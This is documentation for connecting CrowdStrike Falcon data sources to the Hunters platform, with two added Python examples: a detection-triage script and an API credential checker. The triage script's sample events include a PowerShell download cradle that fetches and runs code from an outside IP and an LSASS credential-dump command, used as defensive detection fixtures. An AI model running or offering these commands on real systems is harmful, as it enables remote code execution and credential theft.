CrowdStrike

Self Service Ingestion

Connect this data source on your own, using the Hunters platform.

TL;DR

Supported data types               Table name                               Log format  Collection method
CrowdStrike Raw Events             crowdstrike_raw_events                   NDJSON      CrowdStrike Store
CrowdStrike Detections             crowdstrike_detects                      NDJSON      CrowdStrike Store
CrowdStrike Devices                crowdstrike_devices                      NDJSON      CrowdStrike Store
CrowdStrike Incidents              crowdstrike_incidents                    NDJSON      CrowdStrike Store
CrowdStrike Identity Based Alerts  crowdstrike_idp                          NDJSON      API
CrowdStrike Mobile                 crowdstrike_mobile                       NDJSON      API
CrowdStrike Spotlight              crowdstrike_spotlight                    NDJSON      API
CrowdStrike Indicators             crowdstrike_indicators                   NDJSON      API
CrowdStrike FileVantage            crowdstrike_filevantage_queries_changes  NDJSON      API
CrowdStrike Falcon Event Streams   crowdstrike_falcon_event_streams         NDJSON      CrowdStrike Store
CrowdStrike Alerts                 crowdstrike_alerts                       NDJSON      API

(The original table also marks each data type for 3rd party detection, Hunters detection, IOC search and Search support; those per-row marks did not survive extraction.)


Overview

CrowdStrike is a cybersecurity company that provides endpoint security, threat intelligence and incident response services. Its flagship product, CrowdStrike Falcon, is a cloud-managed endpoint protection platform: a lightweight sensor on each host streams telemetry to the Falcon cloud, where machine learning and behavioural indicators of attack (IOAs) are used to detect and block threats in near real time.

📘 Note

The following modules are needed for data collection:

  • Detections - requires Insight module.

  • Spotlight - requires Spotlight module.

  • Raw telemetry - requires Falcon Data Replicator.

Supported data types

⚠️ Attention

If you have several CrowdStrike customer IDs (CIDs) under one parent CID, set up a separate data flow for each child CID. Do not use the parent CID when setting up the connection on Hunters; a connection made with the parent CID will not deliver the child tenants' data.

CrowdStrike Raw Events

Overview

Table name: crowdstrike_raw_events

CrowdStrike raw events are the telemetry the Falcon sensor records on each endpoint and that CrowdStrike delivers in bulk through Falcon Data Replicator (FDR): process execution, network connections, DNS requests, file and registry activity, user logons and many other event types, not only the events that produced a detection. This is the data type to use for threat hunting and for reconstructing what happened around a detection.

Send data to Hunters

Step 1: Connect Hunters to your CrowdStrike portal

  1. Log into the CrowdStrike Falcon portal.

  2. From the left-side menu, click CrowdStrike Store > All Apps.

  3. Look for the Hunters.AI tile and click to open it.

  4. Click Try it free.

    📘 Note
    1. Your CrowdStrike API token will be shared with Hunters with the following permissions:

      • CrowdStrike Falcon raw data replicator
      • CrowdStrike Detections API
    2. You will receive an automated email from Hunters confirming this action. It is intended for new prospects who have not yet been introduced to Hunters.

  5. To retrieve your Customer ID (CID), open the Falcon menu and navigate to Host setup and management > Sensor downloads.

  6. Copy your Customer ID and store it somewhere safe.

Step 2: Create a data source on Hunters

  1. Follow this procedure to connect CrowdStrike as a data source.
  2. Insert the Customer ID value from the previous section and click Apply.

📘 Note

The Customer ID field is case-sensitive: paste the value exactly as the Falcon console shows it.

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Detections

Overview

Table name: crowdstrike_detects

CrowdStrike detections are generated by analyzing events collected from endpoints across the network. These detections are based on a wide range of indicators and sophisticated analysis techniques, including machine learning, behavioral analysis, and threat intelligence. CrowdStrike's Falcon platform is known for its ability to detect a variety of threats, from malware and ransomware to more subtle indicators of attack (IOAs) and indicators of compromise (IOCs).

Send data to Hunters

CrowdStrike Detections are delivered through the same CrowdStrike Store connection as the other Store-collected data types. Follow Step 1 (Connect Hunters to your CrowdStrike portal) and Step 2 (Create a data source on Hunters) exactly as described under CrowdStrike Raw Events above; no separate API client is needed.

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Devices

Overview

Table name: crowdstrike_devices

CrowdStrike device records describe every host that has a Falcon sensor: hostname, operating system and sensor version, local and external IP addresses, MAC address, first and last seen times, host groups and the policies applied to the host. They are the asset inventory that ties a detection or raw event back to a known machine, and they are what tells you when a sensor has gone quiet or is running an outdated version, which matters for both coverage monitoring and forensic analysis after an incident.

Send data to Hunters

CrowdStrike Devices are delivered through the same CrowdStrike Store connection as the other Store-collected data types. Follow Step 1 (Connect Hunters to your CrowdStrike portal) and Step 2 (Create a data source on Hunters) exactly as described under CrowdStrike Raw Events above; no separate API client is needed.

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Incidents

Overview

Table name: crowdstrike_incidents

CrowdStrike Incidents are part of CrowdStrike Falcon's comprehensive suite of endpoint protection capabilities, focusing on identifying, managing, and resolving security threats across an organization's network. When the Falcon platform detects a series of related security events or behaviors that indicate a more significant issue or attack, it aggregates this information into an incident. This approach helps security teams prioritize and respond to the most critical threats more efficiently, ensuring that resources are focused where they are needed most.

Send data to Hunters

CrowdStrike Incidents are delivered through the same CrowdStrike Store connection as the other Store-collected data types. Follow Step 1 (Connect Hunters to your CrowdStrike portal) and Step 2 (Create a data source on Hunters) exactly as described under CrowdStrike Raw Events above; no separate API client is needed.

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Identity Based Alerts

Overview

Table name: crowdstrike_idp

CrowdStrike's identity-based alerts are raised by Falcon Identity Protection (IDP), which monitors directory and authentication traffic for threats that target or involve user identities and credentials: credential theft, password spraying and other anomalous authentication, privilege escalation, and lateral movement with compromised accounts. Ingesting them alongside endpoint detections lets identity activity and host activity be correlated in one place, which is where most credential-driven intrusions are caught.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).

Step 1: Create an API client

Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here). A read-only scope is all this integration needs; do not grant write scopes to this client. Treat the client secret as a credential: the Falcon console shows it only once, when the client is created, so copy it directly into a secrets store.

Step 2: Create a data source on Hunters

Complete the data source setup on the Hunters platform, following this process, and supply the following values:

  • Client ID
  • Client Secret
  • Cloud Endpoint - the API hostname of the Falcon cloud region that holds your CID, without the https:// prefix or any path. For example: api.crowdstrike.com (US-1). Other regions have their own hostname (for example api.us-2.crowdstrike.com or api.eu-1.crowdstrike.com), and an API client only authenticates against the region it was created in, so a wrong endpoint fails at the token request.

CrowdStrike Mobile

Overview

Table name: crowdstrike_mobile

Mobile logs in CrowdStrike encompass detailed records of activities, events, and security incidents on mobile devices that are protected by the CrowdStrike Falcon platform. These logs are crucial for monitoring the security posture of mobile devices, investigating incidents, and ensuring compliance with organizational security policies.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).

Step 1: Create an API client

Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here). A read-only scope is all this integration needs.

Step 2: Create a data source on Hunters

Complete the data source setup on the Hunters platform, following this process, and supply the following values:

  • Client ID
  • Client Secret
  • Cloud Endpoint - the API hostname of the Falcon cloud region that holds your CID, without the https:// prefix or any path. For example: api.crowdstrike.com (US-1); other regions use their own hostname.

CrowdStrike Spotlight

Overview

Table name: crowdstrike_spotlight

Spotlight logs contain detailed information about detected vulnerabilities in an organization's endpoints. These logs are essential for tracking, managing, and mitigating vulnerabilities effectively. The data includes specifics about each vulnerability, such as its severity, the affected software or system component, and recommendations for remediation.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).

Step 1: Create an API client

Create a CrowdStrike API client with the Vulnerabilities: Read scope and permissions (as specified here). A read-only scope is all this integration needs.

Step 2: Create a data source on Hunters

Complete the data source setup on the Hunters platform, following this process, and supply the following values:

  • Client ID
  • Client Secret
  • Cloud Endpoint - the API hostname of the Falcon cloud region that holds your CID, without the https:// prefix or any path. For example: api.crowdstrike.com (US-1); other regions use their own hostname.

CrowdStrike Indicators

Overview

Table name: crowdstrike_indicators

CrowdStrike Indicators are the indicators of compromise published by CrowdStrike Falcon Intelligence: file hashes, domains, IP addresses, URLs and similar observables, each tagged with the threat actors and malware families CrowdStrike associates with it, a malicious-confidence rating and the kill-chain stage where it was seen. They are threat intelligence rather than detections from your own hosts; ingesting them lets your other telemetry be matched against CrowdStrike's intelligence.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).

Step 1: Create an API client

Create a CrowdStrike API client with the INDICATORS (FALCON INTELLIGENCE): Read scope and permissions (as specified here). A read-only scope is all this integration needs.

Step 2: Create a data source on Hunters

Complete the data source setup on the Hunters platform, following this process, and supply the following values:

  • Client ID
  • Client Secret
  • Cloud Endpoint - the API hostname of the Falcon cloud region that holds your CID, without the https:// prefix or any path. For example: api.crowdstrike.com (US-1); other regions use their own hostname.

CrowdStrike FileVantage

Overview

Table name: crowdstrike_filevantage_queries_changes

FileVantage is CrowdStrike's file integrity monitoring (FIM) module. It records changes to the files and directories (and, on Windows, registry keys) that match the monitoring rules you define, along with the user and process responsible where the sensor can attribute them, so that unauthorised modification of configuration files, binaries and secrets is detected and can be investigated. It is a change-monitoring tool, not a data loss prevention product: it tells you what changed on the endpoint, not what data left it.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).

Step 1: Create an API client

Create a CrowdStrike API client with the FILEVANTAGE: Read scope and permissions (as specified here). A read-only scope is all this integration needs.

Step 2: Create a data source on Hunters

Complete the data source setup on the Hunters platform, following this process, and supply the following values:

  • Client ID
  • Client Secret
  • Cloud Endpoint - the API hostname of the Falcon cloud region that holds your CID, without the https:// prefix or any path. For example: api.crowdstrike.com (US-1); other regions use their own hostname.

CrowdStrike Falcon Event Streams

Overview

Table name: crowdstrike_falcon_event_streams

CrowdStrike Falcon Event Streams is the Falcon platform's near-real-time push feed. Unlike Raw Events, which carry per-process and per-connection sensor telemetry through Falcon Data Replicator, Event Streams carries the summary events the platform itself produces as they happen: detection summaries, incident summaries, authentication and user-activity audit events from the Falcon console, and Real Time Response session events. Because a detection summary appears on the stream as soon as it is raised, this is the data type that gets a new detection into Hunters with the least delay, and the audit events are what you need to see who changed a policy or ran a remote session.

Send data to Hunters

If you already have CrowdStrike connected

  1. On the Hunters platform, navigate to Data > Data sources.

  2. Click + Add data sources to view a list of your connected data sources.

  3. Locate CrowdStrike and click Edit Connection.

  4. Make sure the CROWDSTRIKE API tab is selected.

  5. Scroll down to the Data Types section and activate the CrowdStrike Falcon Event Streams data source.

  6. Now click Test Connection and once the test is successful, click Apply.

If this is your first time connecting CrowdStrike

Falcon Event Streams is delivered through the CrowdStrike Store connection. Follow Step 1 (Connect Hunters to your CrowdStrike portal) and Step 2 (Create a data source on Hunters) exactly as described under CrowdStrike Raw Events above.

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

Expected format (one JSON object per NDJSON line; a detection summary event is shown, and the identifiers in it are illustrative)

{
  "AgentId": "afwehw34h5a235h23h52",
  "AggregateId": "aggind:afwehw34h5a235h23h52:577551784278489191",
  "CommandLine": "/usr/sbin/systemsetup -setremotelogin on",
  "CompositeId": "a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400",
  "DataDomains": "Endpoint",
  "Description": "A process triggered an informational severity custom rule.",
  "FalconHostLink": "https://falcon.crowdstrike.com/activity-v2/detections/a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400?_cid=afwh35rw3h3hwh3",
  "FileName": "systemsetup",
  "FilePath": "/usr/sbin/systemsetup",
  "FilesAccessed": [
    {
      "FileName": "systemsetup",
      "FilePath": "/usr/sbin/",
      "Timestamp": 1727004600
    },
    {
      "FileName": "fawegweg",
      "FilePath": "/dev/",
      "Timestamp": 1727004600
    },
    {
      "FileName": "pass",
      "FilePath": "/private/etc/",
      "Timestamp": 1727004600
    },
    {
      "FileName": ".fawefgawaw",
      "FilePath": "/private/var/root/",
      "Timestamp": 1727004600
    },
    {
      "FileName": "dtracehelper",
      "FilePath": "/dev/",
      "Timestamp": 1727004600
    }
  ],
  "GrandParentCommandLine": "/usr/sbin/cron",
  "GrandParentImageFileName": "cron",
  "GrandParentImageFilePath": "/usr/sbin/cron",
  "HostGroups": "2b5993dc70a249b3956e31e4c936f599,c1d473c1c8d546ea87c35f4c02bdf0b2,e452e9983a9f4939abd3e9612b1480ba",
  "Hostname": "ASDHA4356HSWE",
  "IOARuleGroupName": "macOS Custom Detections",
  "IOARuleInstanceID": "73",
  "IOARuleInstanceVersion": 3,
  "IOARuleName": "Remote services. Remote login enabled",
  "LocalIP": "169.254.254.200",
  "LocalIPv6": "",
  "LogonDomain": "",
  "MACAddress": "aa-bb-cc-dd-ee-df",
  "MD5String": "bc91819b3a077dca8ba4054f1c8562ca",
  "Name": "Suspicious Activity",
  "Objective": "Falcon Detection Method",
  "ParentCommandLine": "/bin/sh -c /usr/sbin/systemsetup -setremotelogin on &> /dev/null",
  "ParentImageFileName": "bash",
  "ParentImageFilePath": "/bin/bash",
  "ParentProcessId": 577551784277851239,
  "PatternDispositionDescription": "Detection, standard detection.",
  "PatternDispositionFlags": {
    "BlockingUnsupportedOrDisabled": false,
    "BootupSafeguardEnabled": false,
    "CriticalProcessDisabled": false,
    "Detect": false,
    "FsOperationBlocked": false,
    "HandleOperationDowngraded": false,
    "InddetMask": false,
    "Indicator": false,
    "KillActionFailed": false,
    "KillParent": false,
    "KillProcess": false,
    "KillSubProcess": false,
    "OperationBlocked": false,
    "PolicyDisabled": false,
    "ProcessBlocked": false,
    "QuarantineFile": false,
    "QuarantineMachine": false,
    "RegistryOperationBlocked": false,
    "Rooting": false,
    "SensorOnly": false,
    "SuspendParent": false,
    "SuspendProcess": false
  },
  "PatternDispositionValue": 0,
  "PatternId": 41009,
  "ProcessEndTime": 0,
  "ProcessId": 577551784277851241,
  "ProcessStartTime": 1727004600,
  "SHA1String": "0000000000000000000000000000000000000000",
  "SHA256String": "0467c233807480601368edac622e93c060ef7b3fcd444c0786956a7f1facb505",
  "Severity": 10,
  "SeverityName": "Informational",
  "SourceProducts": "Falcon Insight",
  "SourceVendors": "CrowdStrike",
  "Tactic": "Custom Intelligence",
  "Technique": "Indicator of Attack",
  "Type": "ldt",
  "UserName": "root"
}
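The record above is one detection summary; in the feed Hunters receives, each such record is one NDJSON line. The following is an added example, not Hunters' or CrowdStrike's code, of the triage logic a detection engineer would run over that feed. It reads PatternDispositionFlags to separate detections the sensor actually enforced (killed, blocked, quarantined) from detect-only ones, discards the all-zero SHA1 the sensor reports when it has not computed one, and rebuilds the grandparent > parent > child command-line chain for the analyst. The severity-to-name mapping follows CrowdStrike's scale as it appears in the Severity and SeverityName fields; the three sample records, their hostnames, command lines and the escalation threshold are constructed for the example.

```python
"""Triage of CrowdStrike detection-summary events delivered as NDJSON (added example)."""
import json

# CrowdStrike's numeric severity scale as seen in the Severity / SeverityName fields.
SEVERITY_NAMES = {10: "Informational", 30: "Low", 50: "Medium", 70: "High", 90: "Critical"}

# PatternDispositionFlags that mean the sensor enforced something rather than only observing.
ENFORCEMENT_FLAGS = (
    "KillProcess", "KillParent", "KillSubProcess", "SuspendProcess", "SuspendParent",
    "ProcessBlocked", "OperationBlocked", "FsOperationBlocked", "RegistryOperationBlocked",
    "QuarantineFile", "QuarantineMachine",
)


def parse_ndjson(text: str) -> list:
    """One JSON object per non-blank line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def was_enforced(event: dict) -> bool:
    """True when any kill/block/quarantine disposition flag is set on the event."""
    flags = event.get("PatternDispositionFlags") or {}
    return any(flags.get(name, False) for name in ENFORCEMENT_FLAGS)


def process_chain(event: dict) -> list:
    """Grandparent -> parent -> child command lines, skipping ancestors the event lacks."""
    keys = ("GrandParentCommandLine", "ParentCommandLine", "CommandLine")
    return [event[k] for k in keys if event.get(k)]


def pivot_hashes(event: dict) -> dict:
    """File hashes usable for IOC pivots; an all-zero hash means the sensor did not compute it."""
    out = {}
    for field, name in (("MD5String", "md5"), ("SHA1String", "sha1"), ("SHA256String", "sha256")):
        value = event.get(field) or ""
        if value and set(value) != {"0"}:
            out[name] = value
    return out


def triage(event: dict) -> dict:
    """Reduce one detection summary to the fields an analyst triages on."""
    return {
        "composite_id": event.get("CompositeId"),
        "host": event.get("Hostname"),
        "user": event.get("UserName"),
        "severity": SEVERITY_NAMES.get(event.get("Severity"), event.get("SeverityName", "Unknown")),
        "detect_only": not was_enforced(event),
        "rule": event.get("IOARuleName") or event.get("Name"),
        "tactic": event.get("Tactic"),
        "technique": event.get("Technique"),
        "chain": process_chain(event),
        "hashes": pivot_hashes(event),
    }


def needs_analyst(event: dict, min_severity: int = 50) -> bool:
    """Detect-only events at or above min_severity: the sensor saw it but did not stop it."""
    return event.get("Severity", 0) >= min_severity and not was_enforced(event)


def triage_feed(text: str) -> list:
    return [triage(e) for e in parse_ndjson(text)]


def escalations(text: str, min_severity: int = 50) -> list:
    """CompositeIds that need a human, in feed order."""
    return [e["CompositeId"] for e in parse_ndjson(text) if needs_analyst(e, min_severity)]


# Constructed sample feed following the field layout shown above. The first record mirrors
# the page's macOS example; the other two are made up to show an enforced and an escalated case.
_FLAGS_NONE = {name: False for name in ENFORCEMENT_FLAGS}
_SAMPLE_EVENTS = [
    {"CompositeId": "cid1:ind:agent1:1-41009-3969400", "Hostname": "ASDHA4356HSWE", "UserName": "root",
     "Severity": 10, "SeverityName": "Informational",
     "IOARuleName": "Remote services. Remote login enabled",
     "Tactic": "Custom Intelligence", "Technique": "Indicator of Attack",
     "GrandParentCommandLine": "/usr/sbin/cron",
     "ParentCommandLine": "/bin/sh -c /usr/sbin/systemsetup -setremotelogin on &> /dev/null",
     "CommandLine": "/usr/sbin/systemsetup -setremotelogin on",
     "MD5String": "bc91819b3a077dca8ba4054f1c8562ca", "SHA1String": "0" * 40,
     "SHA256String": "0467c233807480601368edac622e93c060ef7b3fcd444c0786956a7f1facb505",
     "PatternDispositionFlags": _FLAGS_NONE},
    {"CompositeId": "cid1:ind:agent2:2-1234-1", "Hostname": "WS-FIN-07", "UserName": "jdoe",
     "Severity": 70, "SeverityName": "High", "Name": "LSASS memory read via comsvcs MiniDump",
     "Tactic": "Credential Access", "Technique": "OS Credential Dumping",
     "ParentCommandLine": "cmd.exe /c start rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\Windows\\Temp\\l.dmp full",
     "SHA256String": "a" * 64, "PatternDispositionFlags": {**_FLAGS_NONE, "KillProcess": True}},
    {"CompositeId": "cid1:ind:agent3:3-5678-2", "Hostname": "SRV-DB-02", "UserName": "svc_backup",
     "Severity": 50, "SeverityName": "Medium", "Name": "PowerShell download cradle",
     "Tactic": "Execution", "Technique": "PowerShell",
     "CommandLine": "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
     "SHA256String": "b" * 64, "PatternDispositionFlags": _FLAGS_NONE},
]
SAMPLE_NDJSON = "\n".join(json.dumps(e) for e in _SAMPLE_EVENTS) + "\n"

if __name__ == "__main__":
    for row in triage_feed(SAMPLE_NDJSON):
        print(row)
    print("escalate:", escalations(SAMPLE_NDJSON))
```

The point of the detect_only flag is that PatternDispositionValue 0 with every flag false, as in the page's example, means Falcon logged the activity and did nothing else; those are the detections that still need a human, whereas an event with KillProcess set has already been contained and is lower priority for response even at a higher severity.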

CrowdStrike Alerts

Overview

Table name: crowdstrike_alerts

The CrowdStrike Alerts API is the unified interface for alerts generated across Falcon products (endpoint detections, identity, mobile and others) and is CrowdStrike's replacement for the legacy Detections API that backs the crowdstrike_detects table above. It returns the same alert records the Falcon console shows, with their composite IDs, severity, tactic and technique, process and host context and current status, so they can be retrieved, filtered and kept in sync with the actions analysts take in Falcon. If you are setting up CrowdStrike for the first time, this is the table to prefer for alert data.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).

Step 1: Create an API client

Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here). A read-only scope is all this integration needs. One API client with the Alerts: Read scope also serves the Identity Based Alerts and Mobile data types above.

Step 2: Create a data source on Hunters

Complete the data source setup on the Hunters platform, following this process, and supply the following values:

  • Client ID
  • Client Secret
  • Cloud Endpoint - the API hostname of the Falcon cloud region that holds your CID, without the https:// prefix or any path. For example: api.crowdstrike.com (US-1); other regions use their own hostname.
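Every API-collected data type on this page (Identity Based Alerts, Mobile, Spotlight, Indicators, FileVantage and Alerts) ends with the same two values being typed into the Hunters form, and the two mistakes that cost the most time are a Cloud Endpoint pasted with a scheme or path and a client created without the scope the table needs. The script below is an added example, not Hunters' or CrowdStrike's code, of a pre-flight check to run before saving the data source: it normalises the endpoint to the bare hostname the form expects and rejects hostnames outside the public Falcon regions, and, when credentials are present, requests an OAuth2 token from the region's /oauth2/token endpoint and makes one read-only call per scope to confirm the client can actually read that resource. The region list is CrowdStrike's public US-1, US-2, EU-1 and US-GOV-1 API hostnames; the probe paths are taken from the Falcon API reference as the author knows it and are marked as assumptions in the code, as are the environment variable names.

```python
"""Pre-flight check for a CrowdStrike API client before entering it on Hunters (added example)."""
import json
import os
import urllib.error
import urllib.parse
import urllib.request

# Public Falcon API hostnames by cloud region: US-1, US-2, EU-1, US-GOV-1.
KNOWN_ENDPOINTS = {
    "api.crowdstrike.com",
    "api.us-2.crowdstrike.com",
    "api.eu-1.crowdstrike.com",
    "api.laggar.gcw.crowdstrike.com",
}

# Read-only query endpoints used to probe each scope this page asks for, keyed by the scope
# name as the page writes it. Paths are assumed from the Falcon API reference; the Spotlight
# query requires a filter, so a minimal one is supplied.
SCOPE_PROBES = {
    "Alerts: Read": "/alerts/queries/alerts/v2?limit=1",
    "Vulnerabilities: read": "/spotlight/queries/vulnerabilities/v1?limit=1&filter=status%3A%27open%27",
    "INDICATORS (FALCON INTELLIGENCE): read": "/intel/queries/indicators/v1?limit=1",
    "FILEVANTAGE: read": "/filevantage/queries/changes/v2?limit=1",
}


def normalize_cloud_endpoint(value: str) -> str:
    """Reduce whatever was pasted to the bare hostname the Hunters form wants.

    Accepts 'https://api.crowdstrike.com/', 'API.EU-1.crowdstrike.com:443', etc., and
    raises ValueError for a host outside the known regions so a typo is caught before save.
    """
    raw = value.strip()
    if "://" not in raw:
        raw = "https://" + raw  # urlsplit only finds the host when a scheme is present
    host = (urllib.parse.urlsplit(raw).hostname or "").lower()
    if host not in KNOWN_ENDPOINTS:
        raise ValueError(f"unrecognised Falcon API host: {host!r}")
    return host


def token_request(endpoint: str, client_id: str, client_secret: str) -> urllib.request.Request:
    """Build the OAuth2 client-credentials request: form-encoded POST to /oauth2/token."""
    body = urllib.parse.urlencode({"client_id": client_id, "client_secret": client_secret}).encode()
    return urllib.request.Request(
        f"https://{endpoint}/oauth2/token", data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded", "Accept": "application/json"},
    )


def fetch_token(endpoint: str, client_id: str, client_secret: str) -> str:
    """Exchange the client credentials for a bearer token (network call)."""
    with urllib.request.urlopen(token_request(endpoint, client_id, client_secret), timeout=15) as resp:
        return json.load(resp)["access_token"]


def probe_scope(endpoint: str, token: str, scope: str) -> bool:
    """True if the client can read the resource behind `scope`; False on HTTP 403 (scope missing)."""
    req = urllib.request.Request(f"https://{endpoint}{SCOPE_PROBES[scope]}",
                                 headers={"Authorization": f"Bearer {token}"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return 200 <= resp.status < 300
    except urllib.error.HTTPError as e:
        if e.code == 403:
            return False
        raise


if __name__ == "__main__":
    # Environment variable names are this example's own convention.
    ep = normalize_cloud_endpoint(os.environ.get("FALCON_CLOUD_ENDPOINT", "api.crowdstrike.com"))
    cid, secret = os.environ.get("FALCON_CLIENT_ID"), os.environ.get("FALCON_CLIENT_SECRET")
    if not (cid and secret):
        print(f"endpoint ok: {ep} (set FALCON_CLIENT_ID and FALCON_CLIENT_SECRET to test the client)")
    else:
        try:
            tok = fetch_token(ep, cid, secret)
        except urllib.error.HTTPError as e:
            raise SystemExit(f"token request failed ({e.code}): check the client ID/secret and that {ep} is your region")
        for scope in SCOPE_PROBES:
            print(f"{scope:42} {'granted' if probe_scope(ep, tok, scope) else 'missing'}")
```

A 401 at the token step with correct credentials almost always means the wrong region: an API client exists only in the cloud that holds its CID, and api.crowdstrike.com will not issue a token for a client created in EU-1. A 403 on a probe with a valid token means the client is missing that scope; fix it in the Falcon console rather than widening the client to everything.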